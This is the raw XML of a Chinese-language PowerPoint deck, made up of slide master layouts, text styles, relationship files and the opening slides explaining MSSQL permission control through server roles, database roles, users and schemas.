          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="文本占位符 161801"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576388" y="1557338"/>
            <a:ext cx="9896475" cy="4319587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="-342900"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161803" name="日期占位符 161802"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1549400" y="6243638"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{82F288E0-7875-42C4-84C8-98DBBD3BF4D2}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2024/9/1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161804" name="页脚占位符 161803"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="6243638"/>
            <a:ext cx="3862388" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1400">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161805" name="灯片编号占位符 161804"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9072563" y="6237288"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7D9BB5D0-35E4-459D-AEF3-FE4D7C45CC19}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="图片 3" descr="LOGO"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9072563" y="-4762"/>
            <a:ext cx="3248025" cy="1217612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1493838" y="1212850"/>
            <a:ext cx="9764712" cy="76200"/>
            <a:chOff x="2424953" y="1238297"/>
            <a:chExt cx="7322890" cy="76200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2424953" y="1238297"/>
              <a:ext cx="1463040" cy="76200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00C3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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8284803" y="1238297"/>
              <a:ext cx="1463040" cy="76200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E94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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5351033" y="1238297"/>
              <a:ext cx="1463040" cy="76200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0289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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6814073" y="1238297"/>
              <a:ext cx="1463040" cy="76200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F3C3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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3887993" y="1238297"/>
              <a:ext cx="1463040" cy="76200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DE6E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Rockwell" panose="02060503020205020403"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </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25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txStyles>
    <p:titleStyle>
      <a:lvl1pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2800" b="0" i="0" u="none" kern="1200" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:body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latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" lvl="1" indent="-285750" algn="l" defTabSz="91440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
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="标题 161800"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493838" y="436563"/>
            <a:ext cx="7702550" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="文本占位符 161801"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576388" y="1557338"/>
            <a:ext cx="9896475" cy="4319587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="-342900"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161803" name="日期占位符 161802"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1549400" y="6243638"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{82F288E0-7875-42C4-84C8-98DBBD3BF4D2}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2024/9/1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161804" name="页脚占位符 161803"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="6243638"/>
            <a:ext cx="3862388" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1400">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161805" name="灯片编号占位符 161804"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9072563" y="6237288"/>
            <a:ext cx="2540000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400">
                <a:latin typeface="Tahoma" panose="020B0804030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7D9BB5D0-35E4-459D-AEF3-FE4D7C45CC19}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="图片 3" descr="LOGO"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9072563" y="-4762"/>
            <a:ext cx="3248025" cy="1217612"/>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sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buNone/>
        <a:defRPr sz="2800" b="0" i="0" u="none" kern="1200" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="folHlink"/>
        </a:buClr>
        <a:buSzPct val="60000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2000" b="0" i="0" u="none" kern="1200" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" lvl="1" indent="-285750" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="hlink"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>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lr>
          <a:schemeClr val="folHlink"/>
        </a:buClr>
        <a:buSzPct val="50000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>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lr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buSzPct val="55000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>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lr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="50000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>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24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9.xm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9.xml"/><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9.xml"/><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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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9.xml"/><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9.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9.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9.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9.xml"/></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7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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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0.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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8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9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/></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9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/></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9.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/></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9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/></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9.xml"/></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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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9.xml"/></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6.xml"/><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29.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide29.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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232462" y="4140962"/>
            <a:ext cx="4216594" cy="1235710"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hello All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43840" y="335251"/>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权限控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687494" y="1566334"/>
            <a:ext cx="10497820" cy="266489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indent="239601" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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 MSSQL</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的安全体系结构中包括了几</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个</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含有特定隐含权限的角色</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。除了数据库拥有者创建的角色之外，还有两类预定义的角色。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="239601" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="239601" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pP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 这些可以创建的角色可以分为如下几类：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="575719" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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固定服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="575719" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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固定数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="575719" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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用户自定义</a:t>
            </a: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43840" y="335251"/>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权限控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="984673"/>
            <a:ext cx="9965267" cy="36932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defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>MSSql中角色和用户的详细解释：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6091768" y="2711873"/>
            <a:ext cx="5825913" cy="328044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marL="228594" indent="-228594" defTabSz="1219170" hangingPunct="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pP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数据库角度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pP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数据库用户：指有权限能操作数据库的用户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pP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数据库角色</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：指一组固定的有某些权限的数据库角色，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>针对某个特定数据库设定的角色和权限。</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pP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数据库架构：指数据库对象的容器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
